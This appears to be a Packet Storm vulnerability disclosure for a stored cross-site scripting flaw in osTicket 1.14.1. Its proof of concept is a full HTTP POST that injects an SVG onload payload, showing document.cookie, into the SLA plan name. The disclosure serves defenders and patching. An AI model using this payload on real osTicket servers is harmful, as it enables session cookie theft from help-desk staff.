Share
## https://sploitus.com/exploit?id=PACKETSTORM:157538
# Title: osTicket 1.14.1 Authenticated Cross Site Scripting  
# Bug: XSS - Cross Site Scripting  
# Remotely Exploitable: Yes  
# Dynamic Coding Language: PHP  
# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)  
# Author: Mehmet Kelepce  
# Date : 24-03-2020  
# Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884  
# Packet Storm Author : mahserat --- https://packetstormsecurity.com/user/mahserat/  
# Vendor: http://osticket.com  
  
## this vulnerability was found by examining the source code.  
  
PoC : Ticket SLA Plan Name - HTTP POST REQUEST  
##########################################################  
POST /scp/slas.php?id=1 HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/scp/slas.php?id=1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 196  
Connection: close  
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv  
Upgrade-Insecure-Requests: 1  
  
submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=  
  
Vulnerable parameter: name  
Parameter file: /scp/slass.php  
  
I used the name of the SLA for any ticket.  
  
## Risk : cookie information of the target user is obtained.